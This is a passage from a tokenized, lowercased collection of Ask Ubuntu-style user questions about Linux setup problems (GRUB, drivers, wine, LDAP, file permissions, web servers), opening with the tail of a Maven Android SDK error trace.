com.jayway.maven.plugins.android.generation2 : android-maven-plugin:3.1.1 : generate-sources failed : path `` /opt/android-sdk-linux/platforms '' is not a directory . please provide a proper android sdk directory path as configuration parameter < sdk > < path > ... < /path > < /sdk > in the plugin < configuration/ > . as an alternative , you may add the parameter to commandline : -dandroid.sdk.path= ... or set environment variable android_home . at org.apache.maven.plugin.defaultbuildpluginmanager.executemojo ( defaultbuildpluginmanager.java:110 ) at org.apache.maven.lifecycle.internal.mojoexecutor.execute ( mojoexecutor.java:209 ) ... 27 more caused by : com.jayway.maven.plugins.android.invalidsdkexception : path `` /opt/android-sdk-linux/platforms '' is not a directory . please provide a proper android sdk directory path as configuration parameter < sdk > < path > ... < /path > < /sdk > in the plugin < configuration/ > . as an alternative , you may add the parameter to commandline : -dandroid.sdk.path= ... or set environment variable android_home . at com.jayway.maven.plugins.android.androidsdk.assertpathisdirectory ( androidsdk.java:125 ) at com.jayway.maven.plugins.android.androidsdk.getplatformdirectories ( androidsdk.java:285 ) at com.jayway.maven.plugins.android.androidsdk.findavailableplatforms ( androidsdk.java:260 ) at com.jayway.maven.plugins.android.androidsdk. < init > ( androidsdk.java:80 ) at com.jayway.maven.plugins.android.abstractandroidmojo.getandroidsdk ( abstractandroidmojo.java:844 ) at com.jayway.maven.plugins.android.phase01generatesources.generatesourcesmojo.generater ( generatesourcesmojo.java:329 ) at com.jayway.maven.plugins.android.phase01generatesources.generatesourcesmojo.execute ( generatesourcesmojo.java:102 ) at org.apache.maven.plugin.defaultbuildpluginmanager.executemojo ( defaultbuildpluginmanager.java:101 ) ... 28 more channel stopped finished : failure* android home echo root @ development2 : ~ # echo $ android_home /opt/android-sdk-linux
190943	root login after ldap install ?	i have set up ldap on my local network following the ubuntu manual . for some reason ( after ldap setup , not before ) , it seems to have made a root entity in my ldap tree , which now allows for the availability of root logins . why ? i thought ubuntu 's whole deal was avoiding having a actual root login ? i found it very surprising when i went to work and tried to ssh into my home machine with the root account and supplying it a password worked .
190946	bash script error in my computer but not on some others	the script : waktu= $ ( date + '' % h '' ) kelompok= '' e20 '' dir_skrg= $ ( pwd ) if ( ( $ waktu > = 5 & & $ waktu < = 10 ) ) then salam= '' pagi '' elif ( ( $ waktu > = 10 & & $ waktu < = 3 ) ) then salam= '' siang '' elif ( ( $ waktu > = 4 & & $ waktu < = 7 ) ) then salam= '' sore '' else salam= '' malam '' fi echo “selamat $ salam $ kelompok dengan user $ user , sekarang pukul $ waktu dan pada direktori $ dir_skrg” it gives error : script1.sh : 5 : script1.sh : 14 : not found script1.sh : 8 : script1.sh : 14 : not found script1.sh : 11 : script1.sh : 14 : not found but not in my friend ubuntu 's . andybody knows why ? 14 is the hour when i run the script , i assume for some reason it thinks 14 is a file
190947	how can i properly use dynamic multimonitor in xrandr ?	i have a dell latitude e6520 with ubuntu 12.04 and a dell u2711 monitor connected with my docking station . i tried this https : //help.ubuntu.com/community/dynamicmultimonitor xrandr -- version xrandr program version 1.3.5 server reports randr version 1.3 lspci | grep -i nvidia 01:00.0 vga compatible controller : nvidia corporation gf119 [ quadro nvs 4200m ] ( rev a1 ) nvidia driver version : 295.40 operating system : linux-x86 server version number : 11.0 nv-control-version 1.27 i saved both configurations with ( docked and mobile ) using autorandr -- save xxxx i set up a keyboard shortcut do change the screen on ctrl + f8 . but this only works when i switch from docked to mobile . calling autorandr -- profile docked ( laptop is back in the docking station ) does n't change a thing . autorandr -- load docked /usr/bin/xrandr : failed to get size of gamma for output default /usr/bin/xrandr : failed to get size of gamma for output default unable to fingerprint display configuration - > loading profile docked /usr/bin/xrandr : failed to get size of gamma for output default is there a way to solve my problem ? thanks in advance , your help is much appreciated . edit : the configuration layout is set on twinview . and the nvidia settings only displays 1 screen under x server information .
190949	is it possible to extend thunderbird mail box size ?	is it possible to extend thunderbird mail box size . my thunderbird mailbox size has touched the maximum and it is not able to receive new mails . i just want to know if it is possible to extend or we have to create a new mail box ? what would be the best solution ? pls share your suggestions and fix as well . details : am using thunderbird 14.0 inbox size is of 4.1 gb only .
190955	how to use xdg-desktop-icon ?	i am on ubuntu 12.04 with kde . i 'd like to use the xdg-desktop-icon tool because it can be scripted and works cross desktop . made a minimal file : test.desktop [ desktop entry ] encoding=utf-8 type=application exec=test icon=test name=test used xdg-desktop-icon ... xdg-desktop-icon install -- novendor test.desktop exit code is 0 . ( success . ) but ... i do not see any new icons on my desktop . also not after reboot . how to use the xdg-desktop-icon tool correctly ?
190959	password problem after creating a new user	i created a new user account and when i try to login to that account by switching accounts it said wrong password . i searched here and found my answer here - create a new user in 12.04 ? now when i clicked enable this account and i do n't know what happened from then.. now i 'm with a problem that ubuntu do n't recognising my password . it 's saying there 's no password set but when i 'm clicking it it 's asking for old password .
190965	chmod u+s in /var/www	i have a problem at granting the right rights for the right user ... i want to run pootle with apache , so i downloaded pootle . then i copied it to /var/www , installed it and gave the www-data user rights for the whole folder . as far as good ... now i want to copy the translated files from and to the translation-directory ( e.g . /var/www/pootle/po/project ) . so i created a group ( www ) added me to the group and executed sudo chown -r : www /var/www/pootle ok , so now i have rights to write files into the directory , however , when apache creates a file , its group is www-data ... sudo chmod -r g+s /var/www/pootle ok , now the group is always `` www '' , as i wanted it to be ... now here is the problem : when i write files to /var/www/pootle they are there , however , with my user as owner , and not , as i awaited , as www-data , although i executed the command : sudo chmod -r u+s /var/www/pootle is there a way that i can say that the user who created the file , even if its me , shall be www-data ? thx in advance : )
190970	ubuntu-overlay-scrollbars set to false shows no arrows in several cases	i 'm running 12.04 , and prefer the more conservative style `` normal '' scrollbars over the overlay scrollbars . i have set them to false in the terminal : gsettings set org.gnome.desktop.interface ubuntu-overlay-scrollbars false however after doing so , with some apps ( e.g . nautilus , document viewer ) my scrollbars only view a vertical bar , but no arrows on the top and bottom to scroll up and down . with some programs these are shown though , for instance gummi and texmaker . it would make a big difference ( for instance when having to scroll pdf documents containing several hundreds of pages ) to have those arrows reinstated . is there any way to make this work ?
190971	autohiding unity sidelauncher *only* if i start typing at the keyboard	is it possible to make the unity launcher autohide , if i start typing at the keyboard ? i know it can be set to autohide in compiz after a fixed interval , but i want it to autohide only at the event , if i start typing at ther keyboard and have typed more that 20 letters .
190972	is legal/ethical to obtain upload rigths to the ubuntu archives to fund a support company ?	i live in mexico city and in the time i 've been involved with ubuntu i 've not seen any local company that offer professional support for ubuntu . is legal/ethical to try to obtain permissions to the ubuntu archive to provide a better support service ? , i have a friend who 's trying to obtain upload rights to debian too . the idea is that we could provide a more close to ubuntu/canonical support for our future customers , however i 'm not sure if that would be right .
190973	ptd software alternative	what is the alternative for ptd on ubuntu ? the partition table doctor ( ptd ) does not have a linux version and what are the compatible partitions that it can handle : ntfs , ext2,3,4 , btrfs
190975	how do i find add-ons for packages when using the command line ?	my question is a little bit different from others already asked , i guess . i 've already searched for answers , but i did n't find anything related . for example , i 've always installed k3b via terminal with the following command `` sudo apt-get install k3b '' . it always worked , of course . one day , i decided to install it via ubuntu sofware center and , to my surprise , there were a few add-ons i did n't know about . i checked some of them to be installed as well because i found them useful . now , here 's my question : when we try to install a software via terminal and this software has add-ons , how do we know that ? and how do we install the add-ons via terminal ? i suppose we have to know the names of the add-ons first , and then install them one by one , once the main software has already been installed . but how do we get to know those names via terminal ? using the software center is cool because it shows the add-ons , a brief description for each one and their names in brackets , right ? how about that via terminal ? i had never paid attention to this until i used the software center . by the way , k3b was just an example , of course .
190976	how do i compile format junkie ?	the ppa : hakermania/format-junkie is down , at least for me , is it possible to compile format junkie in 11.10 ? if so , how ? this is the list of files i have : about.cpp error_logs.h main.cpp about.h error_logs.ui mainwindow.cpp about.ui formatjunkie.pro mainwindow.h audio_video_properties.cpp glob.h mainwindow.ui audio_video_properties.h icons.qrc pictures audio_video_properties.ui image_properties.cpp preferences.cpp data image_properties.h preferences.h error_logs.cpp image_properties.ui preferences.ui
190981	grub rescue error : unknown filesystem	i have a dual o.s linux ( ubuntu 11.10 ) and windows 7.i have a problem in grub.i had done a mistake.in windows there is a option called disk management there i have deleted one of my partition and renamed it as m drive previously it was g drive . when i switch of the laptop and turned it on it is showing an error grub rescue error : unknown file system.please do help me i am struggling with this problem . please.i dont know what to do
190985	how to block offensive wifi ssid ?	our five-year-old girl is enjoying ubuntu at the moment - there are some great educational and entertainment applications available for kids . but a problem i have is that as she learns to use the mouse she has discovered the network-manager menu . as she is also learning to read at the moment , she is paying attention to new words . there is some pretty offensive stuff popping up from time-to-time and i would like a way to either : a ) block one specific offensive ssid from appearing on the list of available ( but secured ) networks b ) automatically block any offensive entries by keyword . eventually , i think ubuntu could really use something like this but in the mean-time - does anyone know how i could best achieve this effect without uninstalling network-manager ?
190987	problem after login in wordpress site	i have installed wordpress first installation on apache server its opening fine but when i logged in with my user id and password http : //examplesite.com/wp-login.php it is showing blank in firefox and in ie page not open with no errors . i cleared all my browsers cache history still not able to open the page after login . there is no errors logs generated . wordpress version3.4.2 php 5.3.3 mysql 5.1.6
190994	how do i connect to my huawei eg 1732usb modem from terminal ?	i 'm using ubuntu 12.04 & i 'd like to know how can i connect my usb modem through terminal . i mean creating connection and calling it , i want to do from terminal . thank you .
190996	running ubuntu from a usb flash drive on acer	i 've made a bootable usb flash drive to run ubuntu . the drive works fine on most laptops/computers i try : it does not want to start on my ( favourite ) acer aspire 5745 ( windows 7 64 bit ) . the opening screen has syslinux 4.06 edd 4.06-pre1 ( ... ) and simply sits there . i was using ubuntu 12.04.1 64 bit until i tried booting to the acer this morning . i 've tried booting to 10.04 as well ( saw this as a fix on a discussion ) with the same result . i really want to use the acer for development and do not want to wipe my windows 7 from the hard disk . are there any solutions/answers ? i was using a 16 gb cruzer drive ( i was `` playing '' until the two 32 gb kingston drives arrived this morning from staples ) . although cruzer drive worked fine on other laptops it did not want to work on the acer . i formatted one of the 32 gb kingston 's and it fired up immediately . lesson learned for the other poor souls i saw with the same issue . thank you for the quick reply and tell your friends about the solution . baffled me for a bit ...
191001	can someone help me install wine ?	i 'm a beginner in linux and i 'm trying to install wine useing yum install wine i'v tried every thing possible i'v installed epel packages and updated yum but it keeps giving me this error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.7.3 ) error : package : wine-cms-1.4.1-1.el6.i686 ( epel ) requires : liblcms.so.1 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libz.so.1 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.8 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.15 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : gnutls ( x86-32 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.23 ) error : package : wine-pulseaudio-1.4.1-1.el6.i686 ( epel ) requires : alsa-plugins-pulseaudio ( x86-32 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.2 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.21 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libglib-2.0.so.0 error : package : wine-alsa-1.4.1-1.el6.i686 ( epel ) requires : libasound.so.2 ( alsa_0.9 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libglu.so.1 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.5.8 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgl.so.1 error : package : wine-ldap-1.4.1-1.el6.i686 ( epel ) requires : libldap_r-2.4.so.2 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgstreamer-0.10.so.0 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libx11.so.6 error : package : wine-alsa-1.4.1-1.el6.i686 ( epel ) requires : libasound.so.2 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxext.so.6 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libsm.so.6 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.5.7 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libusb-0.1.so.4 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgobject-2.0.so.0 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libice.so.6 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libexif.so.12 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgphoto2_port.so.0 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.14 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxrender ( x86-32 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.4.30 ) error : package : wine-alsa-1.4.1-1.el6.i686 ( epel ) requires : libasound.so.2 ( alsa_0.9.0rc4 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : freetype ( x86-32 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgstapp-0.10.so.0 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgthread-2.0.so.0 error : package : wine-ldap-1.4.1-1.el6.i686 ( epel ) requires : liblber-2.4.so.2 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxcursor ( x86-32 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgphoto2.so.2 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgmodule-2.0.so.0 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 ( libxml2_2.6.0 ) error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libxml2.so.2 error : package : wine-core-1.4.1-1.el6.i686 ( epel ) requires : libgstbase-0.10.so.0 i could really use some help thanks in advance
191008	windows cant see ubuntu	i upgraded to precise pangolin 12.04 and my samba file sharing from windows has stopped . windows vista has worked o.k . in the past . now ubuntu can see files on a windows vista computer and an xp machine on my lan , but not the other way around . windows can ping the ubuntu machine , no problem , either under its ip address or network alias . this is very irritating . does anyone know how to fix this ?
191011	unexpected deletion of directory	i find that somehow the downloads directory in /home/user/ is deleted . on using locate downloads , it shows the existence of directory without any existence of files within . now when i manually create directory named downloads , locate downloads shows the directory as well as the files the original folder had . also there is no hidden downloads folder nor can i access the folder or its files this behavior is quite unexpected .
191012	are delta updates going to appear in ubuntu ?	there are a few giant packages on my machine ( games of several gigabytes ) . when they get an update , i have to re-download the whole package . it would be great i only the changes got pushed between updates . is this kind of delta updating coming to ubuntu ?
191014	unable to update ubuntu 12.04 : authentication required	i initially checked for updates which was successful . it responded that there were 123 updates . after trying to update , i got the following message : unable to install available updates unsuccessful . authentication required . my question is the following : how do i authenticate so that i can continue with the update ?
191019	problem running phpunit	i seem to be having a problem with phpunit running properly on my machine . i have pear installed and running correctly on my machine , and then followed this guide to the letter : http : //www.giocc.com/installing-phpunit-on-ubuntu-11-04-natty-narwhal.html but when i type phpunit in terminal in ubuntu , i get the following response : php warning : require_once ( file/iterator/autoload.php ) : failed to open stream : no such file or directory in /home/thalley887/pear/share/pear/phpunit/autoload.php on line 45 php stack trace : php 1 . { main } ( ) /home/thalley887/pear/bin/phpunit:0 php 2. require ( ) /home/thalley887/pear/bin/phpunit:43 php fatal error : require_once ( ) : failed opening required 'file/iterator/autoload.php ' ( include_path= ' . : /usr/share/php ' ) in /home/thalley887/pear/share/pear/phpunit/autoload.php on line 45 php stack trace : php 1 . { main } ( ) /home/thalley887/pear/bin/phpunit:0 php 2. require ( ) /home/thalley887/pear/bin/phpunit:43 i have checked in my php.ini file and have the following line : include_path = `` . : /usr/share/php '' i am using ubuntu 12.04 . please comment if i can give anymore details . if i ca n't fix this i am going to jump out of the window ! !
191020	can i run ubuntu with vmware ?	hi i was looking to install this with or under vmware on windows 7 64bit , is this possiable and where can i find instructions on how to do so ? i have searched the site and can not find anything for help on installing this with vmware . also i have vmware workstation do i need vmware player ?
191021	ubuntu can not read aiff information	i have apple lossless songs that i use for my ipod , and ubuntu sees the files , but does not recognize any information related to the songs . they show up as unknown artist , album , etc . i have tried converting the songs with audacity , but even after the conversion , there is still no info about the file information . ubuntu sees mp3 data just fine , but i want my lossless songs for my ipod . any ideas ?
191024	just installed ubuntu onto blank hard drive from disk but now wo n't boot	i just installed ubuntu onto a blank hard drive with a 10gb partition and it went fine . when i restarted the pc ( when it asked ) , i quickly changed the bios so that it booted from the hdd not the disk anymore . however now all i get is a black screen with bootmgr is missing press ctrl+alt+del to restart not sure how to fix this issue ?
191027	installation of ubuntu 12.04 using special characters in password	i just installed ubuntu 12.04 from usb ( new install , new partition ) and used special characters in my password , as suggested in another post on askubuntu : lowercase alphabetical ( a , b , c , etc . ) uppercase alphabetical ( a , b , c , etc . ) numerics ( 0 , 1 , 2 , etc . ) special characters ( @ , % , ! , etc . ) the installation finished correctly ( good job by the way , much impressive ) , and upon reboot , the username/password did n't match . i tried camelcase my username and lowercase username . i tried different combinations of `` maybe sticky/faulty keyboard '' . fail . i tried login from tty . fail . the installation was very basic using defaults ( when available ) . english us install , english us keyboard , etc . just before i re-install , and out of curiosity , did i do something wrong ? is it a bug ?
191032	unable to access android 4.0 file folders through usb	when i conect my tablet 's usb to the computer like i used to do on windows i recieve this message : '' dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a replay , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . '' what i can do ?
191033	column view mode with nautilus ( like mac os x finder )	i found a feature request at http : //brainstorm.ubuntu.com/idea/4496/ but it does n't seem easy to get a column view with nautilus while with mac os x it 's a default feature . have i missed something or is this not currently possible ?
191034	weird pixelated checkerboard when installing ubuntu 12.04	i recently tried installing ubuntu 12.04 on my new computer , i tried the windows installer and from a cd but both have failed . as soon as i try to reboot my pc and install it this weird colorful , pixelated checkerboard fills the screen and soon after my monitors loses the signal . i tried following some fixes but they all needed the terminal which i could n't access . my computer specs are : intel i5-2320 3.0ghz 8gb ram amd radeon hd 6670 2gb gddr3 i use dual monitors but i tried the installation with and without both plugged in . any help would be appreciated .
191035	how to use custom fonts for a wine application ?	my windows application needs specialized fonts . the fonts ship with the application so i do n't need to download any extra fonts . when i installed the application it automatically installed the fonts to /home/ < user > /.wine/drive_c/windows/fonts . however , the fonts were not displayed in the application when i ran it . the vendor said the fonts must not be installed correctly . so i manually copied the fonts to /home/ < user > /.fonts/ and restarted the computer . however , the problem was still not resolved . next i used kubuntu 's font management tool and it verified that the required fonts are listed as installed . i 'm not sure what to do next to make the fonts available to the application . any suggestions ?
191040	what are ways of sharing music on ubuntu externally ?	i setup a daap server on my server at home , mapped to my router . in ubuntu i have a variety of clients that support daap . in windows i could n't find clients or easy ways of connecting to my daap server . what are my options , or best way to access my music from outside ? this thread what are my options for sharing music between windows & ubuntu on the same network ? denotes same network , bur hints upnp . upnp becomes confusing because , it uses both udp port 1900 and tcp port 2869 , even if i find a server utility , how would i add both ports ? as of now , windows , vlc , and the few media clients that i tried do n't let you add a upnp server manually . however they let you open urls ? is there a technology available that will add my library through url ? ? i 'll be documenting my progress here . ubuntu daap server using tangerine windows clent options : - [ firefly client ] [ 1 ] : connection refused . - [ songbird plugin ] [ 2 ] : outdated , does n't work with version 2.0.0 android clent options : - [ daap media player ( miceli bros. ) ] [ 3 ] : connects on 3g & wi-fi - [ music pump daap player ( android music pump ) ] [ 4 ] : connects on 3g & wi-fi from the profile of upnp , it does n't look like a protocol that allows you to stream from external libraries you physically plugged in [ vpn counts ] ( granted you broadcast properly to subnet ) . on a local network [ not what i 'm looking for ] daap through vpn and on local network : - itunes will detect daap server and files , but no options to add manually - options above still applicable upnp with ps3 media server : - android - [ bubbleupnp ( bubblesoft ) ] [ 5 ] : detects and streams - [ upnplay ( bebopfreak ) ] [ 6 ] : detects and streams - windows - vlc : sees server , but can not browse , crashes server - wmp : sees server , but shows no content - itunes : does n't even see server - banshee : server listed but greyed out - media monkey : sees sub folders but they empty
191041	when will the humble indie bundle 6 games be supported on 12.10 ?	currently , i can see them in the software center , but they say its not supported for my version of ubuntu . now , i know 12.10 is just in beta , but i see no reason why they would not be supported . is there one ? is the default setting for such packages to say they are not supported ? what is the difference between 12.04 and 12.10 that would make it not supported ? i 'm pretty sure if i just download the standalone .sh install script its going to work , but i 'd rather do so through the software center and get updates .
191042	lighttpd configuration multiple subdomains	i have a lighttpd server as a front end for ruby on rails . some subdomains ( server1.domain.com , server2.domain.com ) are configured with proxy . but also have a standard static web server at www.domain.com . it works , but the call without subdomain ( domain.com ) does not work . how could i configure lighttpd for it ? configuration for proxy : $ http [ `` host '' ] =~ `` www.domain . '' { alias.url = ( `` /system/ '' = > `` /var/www/system/ '' ) proxy.balance = `` fair '' proxy.server = ( `` '' = > ( ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 5750 ) ) ) } configuration for server1 and server2 : $ http [ `` host '' ] =~ `` server1.domain . '' { alias.url = ( `` /system/ '' = > `` /var/www/system/ '' ) proxy.balance = `` fair '' proxy.server = ( `` '' = > ( ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 7757 ) , ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 5222 ) , ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 5223 ) ) ) } $ http [ `` host '' ] =~ `` server2.domain . '' { alias.url = ( `` /system/ '' = > `` /var/www/system/ '' ) proxy.balance = `` fair '' proxy.server = ( `` '' = > ( ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 7787 ) , ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 5282 ) , ( `` host '' = > `` 127.0.0.1 '' , `` port '' = > 5283 ) ) ) }
191043	new to ubuntu : have `` old '' msi netbook with xp . will ubuntu work ?	i am taking the netbook on the road but i 'd like upgrade the os and windows 7 is out of the question . netbook has only 2gb ram . will ubuntu work and can i get rid of xp in the process ? thx !
191044	how to find files between two dates using `` find '' ?	i have an email account that has passed 60gb of emails , and currently i 'm having a lot of trouble using an email client to archive emails of last year ( 2011 ) . via terminal , i am trying to use find to locate the files between 2011-01-01 and 2011-12-31 , but no avail . how can i find files between two dates ? if relevant , the end goal will be a batch that will move each file found , matching the date interval , to a folder .
191045	installing ubuntu failed , now i have just a command line	last night i tried to install ubuntu 12.04 from a usb ( for which i had to use bootice on windows xp to install plop boot manager on the mdr , since i was unable to boot from usb and have no cd rom ) . it was all going fine , but the part when all the programs are installed failed . when it all finished and the computer rebooted , i was left with only a command line login and no desktop environment . is it possible to install the ubuntu-desktop environment from usb ? how ? or maybe i could try to reinstall everything , but how do i boot from usb now that windows has been erased from the hard drive and i ca n't use bootice again ? thank you .
191053	are there benchmarks available for openbox vs metacity resource usage ?	i 'm reading a number of sites on making ubuntu faster/more lightweight ( e.g . this guide , and many mention replacing metacity with openbox . however , in 12.04 on an inspiron e1405 , i only see metacity taking 11mib and ( fairly consistently ) 0 % cpu . am i missing something ? seems like i would be optimizing zero to replace something that uses that few resources
191055	what packages should i install in ubuntu 12.04 to fulfill opengl requirements for using nouveau driver ?	i try to switch from nvidia to nouveau driver via script : ! /bin/bash stop gdm rmmod nvidia sed -i `` s/nouveau/nvidia/ '' /etc/modprobe.d/blacklist-nvidia-nouveau.conf update-alternatives -- set gl_conf /usr/lib/mesa/ld.so.conf ldconfig modprobe nouveau cp /etc/x11/xorg.conf { .nouveau , } start gdm and driver is loaded and x started but compiz it does n't . in .xsession-errors i see : compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - error : initscreen failed compiz ( core ) - error : could n't activate plugin 'opengl' compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( opengl ) - fatal : root visual is not a gl visual gnome-session [ 19075 ] : warning : app 'compiz.desktop ' respawning too quickly gnome-session [ 19075 ] : warning : application 'compiz.desktop ' killed by signal gnome-session [ 19075 ] : warning : app 'compiz.desktop ' respawning too quickly what i 'm doing wrong ? ?
191061	b43legacy drivers for broadcom wireless	i have attempted the legacy drivers as my laptop i installed ubuntu on , is a old hp 4306 model of broadcom . however , after installing and rebooting a few times , i am still unable to see anything listed under addition drivers . any suggestions ? wireless is n't greyed out , it is checked off to use . but it does n't light up on my laptop . there is an actual button i can turn on/off when in windows environment . thanks for any help .
191064	where to place local executables	where is the correct place to store user-local executable files ? echo $ path gives /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games it does n't include eg . $ home/bin would $ home/bin be advisable ? or $ home/opt/bin ... . i guess i would have to add that to my .profile too ?
191068	simple way to rename grub2 entries	i have many different ubuntu versions installed on my hd . i 'd like to rename some of their entries in grub2 boot menu . i have tried two approaches . 1 ) like mentioned in http : //ubuntuforums.org/showthread.php ? t=1347756 - this is not working , i have 9 different lines with sda11 sections visible in my 30_os-prober file . am i supposed to modify all of them while in real boot menu only one entry for this partition is visible after sudo update-grub ? 2 ) i have also tried grub customizer application , but it just overpopulates my boot menu with duplicate entries . instead of doing it hard way by modifying all the entries visible in 30_os-prober file , i would like to know if there is an easy solution ? i may be overlooking something , but if there is no easier way , is this supposed to be harder than with grub1 for a reason ?
191069	how do i change clementine 's play/pause indicator icons ?	this is how the clementine indicator displays play/pause : it 's a minor detail , but i feel that the play and pause icons just do n't go with the monochrome design of the panel . in order to change them i tried to locate all files associated with clementine , but to no avail . here 's the output : /home/user/.config/clementine/clementine.db /usr/bin/clementine /usr/share/app-install/desktop/clementine : clementine.desktop /usr/share/app-install/icons/application-x-clementine.png /usr/share/applications/clementine.desktop /usr/share/doc/clementine /usr/share/doc/clementine/readme.debian /usr/share/doc/clementine/changelog.debian.gz /usr/share/doc/clementine/copyright /usr/share/icons/hicolor/64x64/apps/application-x-clementine.png /usr/share/icons/hicolor/scalable/apps/application-x-clementine.svg /usr/share/icons/ubuntu-mono-dark/apps/24/clementine-panel-grey.png /usr/share/icons/ubuntu-mono-dark/apps/24/clementine-panel.png /usr/share/icons/ubuntu-mono-light/apps/24/clementine-panel-grey.png /usr/share/icons/ubuntu-mono-light/apps/24/clementine-panel.png /usr/share/man/man1/clementine.1.gz /usr/share/menu/clementine /usr/share/pixmaps/clementine-16.xpm /usr/share/pixmaps/clementine.xpm /var/lib/dpkg/info/clementine.list /var/lib/dpkg/info/clementine.md5sums /var/lib/dpkg/info/clementine.postinst /var/lib/dpkg/info/clementine.postrm /var/lib/menu-xdg/applications/menu-xdg/x-debian-applications-sound-clementine.desktop can anyone tell me where to find these icons and how to change them ?
191072	how to restore grub2 after failed burg installation ?	i 'm using 12.04 and few minutes ago i tried to install burg according to this guide . i followed everything till the line burg-emu and there , i saw this minimal bash-like line editing is supported . i installed burg to hda ( because there was an error message [ bad idea ] when i tried this to the partition reserved for grub2 .
191073	update manager does n't show up anymore when there are available updates	like the title says the update manager does n't show up automatically , like it used to do , when there are available updates.to be more specific , the only way i can update my packages/installed programs is either via terminal or run open manually the update manager.does anybody know how can i fix that ?
191075	why does launchpad act differently with 64- and 32-bit packages ?	i 'm making ubuntu packages from the source code of a geology program . i can make deb packages on my pc , and also launchpad is able to make binary packages for 32-bit os . i noticed a strange behavior of launchpad . it makes both development ( libfoo-dev ) and shared library ( libfoo ) from the uploaded source code for i386 although it makes only binary package for amd64 from same code . looking at i386 and amd64 build logs , i found that for amd64 debian/rules binary-arch is called instead of debian/rules binary . this causes my source not to generate a development package for amd64 . how can i solve this issue ? build logs and package sources are available in ppa : soroush-r/geopsy-deb in case you want to take a look .
191080	how to setup nouveau driver at boot time in ubuntu 12.04 ?	i would like add nouveau driver during boot time but i do n't know where is the place in ubuntu 12.04 to add modprobe nouveau .
191082	unity dash to search only in documents	i have a document ( libreoffice calc spreadsheet ) which is in my ~/documents folder . however , i have the same file ( older version of it ) on a mounted drive . in the past few weeks i have opened the file from both my ~/documents folder and from the mounted drive . however , the latest version is the one from ~/documents . when i open the dash and look in the documents lens , of course i will find my file twice there . one from the mounted disk and one from ~/documents . but i do n't know which one is which . so , my question is : how can i limit the document lens to look for documents only from my /home . or to exclude mounted disks from the search . thanks . i use ubuntu 12.04 .
191085	how to mount a drive for other user than root ?	i 've attached a ssd disk though usb . then : sudo su - mkdir /mnt/hx chown ondra /mnt/hx mount /dev/sdb1 /mnt/hx # it 's fat32 now , but was the same with ext4 the last command changes dir owner to root . whenever i create a file in the root dir , i need to be root and root is the owner . can i set different user as owner of the mounted dir ? or , simply said , ensure that user xy can freely read/write on the drive .
191100	how to create a .desktop unity launcher that starts an executable in a specific working directory	well the whole question is in the title . say i have the following launcher # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false name=lantern comment=lantern interface to icc exec=/usr/bin/java -jar /home/john/local/lantern-chess/lantern.jar icon=/ how do i make it run in the /home/john/local/lantern-chess/ folder ?
